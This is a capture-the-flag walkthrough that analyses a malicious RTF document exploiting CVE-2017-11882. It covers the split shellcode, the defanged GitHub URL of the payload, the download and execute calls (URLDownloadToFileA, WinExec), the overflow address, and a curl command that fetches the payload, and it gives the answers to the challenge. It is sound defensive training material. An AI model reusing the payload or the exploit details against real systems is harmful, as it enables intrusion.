As a SOC analyst, you were asked to inspect a suspected document a user received in his inbox. One of your colleagues told you that he could not find anything suspicious. However, throwing the document into the sandboxing solution triggered some alerts.
Your job is to investigate the document further and confirm whether it's malicious or not.
Information
Category Name: Emprisa Maldoc
Files: c39-EmprisaMaldoc.zip 1.7 KB
My Recommendations
This is my personal preference. I like being organized and deleting a folder when I’m done with it .
mkdir Documents/CyberDefenders/Emprisa && cd Documents/CyberDefenders/Emprisa
Download it from CyberDefenders and verify it with:
sha1sum /path/to/c39-EmprisaMaldoc.zipSHA1SUM: e1c1405e3c1b6b252e5630889fa657e63c3dd5c03400dc98ff574903f1ea7dbffb6cd
Walkthrough
1.What is the CVE ID of the exploited vulnerability?
To gain information on the malware, we can lookup the hash of the file in VirusTotal:
md5sum c39-EmprisaMaldoc.rtf
#returns d82341600606afcf027646ea42f285ae
The file is flagged by 40 security vendors, the majority associating it with CVE-2017-11882.
Answer:
CVE-2017-11882
2.To reproduce the exploit in a lab environment and mimic a corporate machine...
running Microsoft office 2007, a specific patch should not be installed. Provide the patch number.
Microsoft provides detailed instructions for Microsoft Office 2007 users on how to mitigate the vulnerability with a security update. The update to download is provided in Method 3:
Patches are formatted as KB$UpdateID.
Answer: KB4011604
3. What is the magic signature in the object data?
Using rtfdump.py :
rtfdump.py c39-EmprisaMaldoc.rtf
Object Data, which is item 7, is named Equation3, and has the magic signature d0cf11e0.
Answer: d0cf11e0
4. What is the name of the spawned process when the document gets opened?
We can analyze the file in Any.run to see which processes are spawned in a Windows Environment:
As we can see, the file is opened with WINWORD.EXE. Then, the process EQNEDT32.EXE is spawned.
This process establishes several connections, including to a github page:
It then drops an executable, named ‘test[1].png. We can save the executable for further analysis.
Answer: EQNEDT32.EXE
5. What is the full path of the downloaded payload?
Using rtfobj, we can save the object to examine its contents:
rtfobj -s 0 c39-EmprisaMaldoc.rtf
strings c39-EmprisaMaldoc.rtf_object_000000FE.bin
Here, we can see a reference to the drive letter C. Since the shellcodes have varying endianess, we can assume the file path starts with C:\o. In the following questions, we reassembled the shellcode and executed with scdbg:
The full path is indeed C:\o.exe
Answer: C:\o.exe
6. Where is the URL used to fetch the payload?
In the previous question, we saved the object. The last line showed a link to a github page, which is consistent with Any.run’s report:
strings c39-EmprisaMaldoc.rtf_object_000000FE.bin
The last line contains the full URL of the payload:
Answer: https[://]raw[.]githubusercontent[.]com/accidentalrebel/accidentalrebel[.]com/gh-pages/theme/images/test[.]png
7. What is the flag inside the payload?
We can download the payload into our vm using curl and then use strings to find the flag:
curl -O #githublink
strings test.png | grep -i flag
Answer: cotizacin
8. The document contains an obfuscated shellcode. What string was used to cut the shellcode in half?
Using rtfdump.py:
rtfdump.py -s 7 -H c39-EmprisaMaldoc.rtf
Looking into the object, we can see that the shellcode is split at ‘Equation Native’, because there is a large empty block following that string.
Answer: Equation Native
We can reconstitute the shellcode by copying the hexdump from offset 0x900 into Cyberchef. Then, we just need to delete everything between ‘450071007500’ and ‘6c6c51686f6e’ and save the file as ‘shellcode.sc’.
9. What function was used to download the payload file from within the shellcode?
Following the previous question, we now have the full shellcode. To see how it is executed, we can use scbdg, with the options ‘Unlimited steps’ and ‘FindSc’ checked. Looking at the output, the function to download the payload is URLDownloadToFileA:
Answer: URLDownloadToFileA
10. What function was used to execute the downloaded payload file?
After the file gets downloaded to path C:\o.exe, it is executed with the function WinExec:
Answer: WinExec
11. Which DLL gets loaded using the "LoadLibrayA" function?
The shellcodes uses the function LoadLibraryA to load the ‘urlmon.dll’ DLL:
Answer: urlmon.dll
12. What is the FONT name that gets loaded by the process to trigger the buffer overflow exploit?(3 words)
If we look again at the structure of the rtf file, we can see there are three items in Level 3:
rtfdump.py c39-EmprisaMaldoc.rtf
Object 6 is basically empty, object 7 contains the shellcode and object 8 contains the Font name used for the buffer overflow. A similar content can be found in object 9 as well.
Answer: Times New Roman
13. What is the GitHub link of the tool that was likely used to make this exploit?
Googline for Times New Roman CVE-2017-1882 Github takes us to this page. The contents of the python code are almost identical to the rtf file.
14. What is the memory address written by the exploit to execute the shellcode?
Looking at the source code, the memory address referenced is 0x00402114:
Answer: 0x00402114
TLDR
– A malicious RTF file, exploiting CVE-2017-11882.
– Use rtfdump.py to analyze the file and its objects.
– Any.run can be used to find dynamic information about the file.
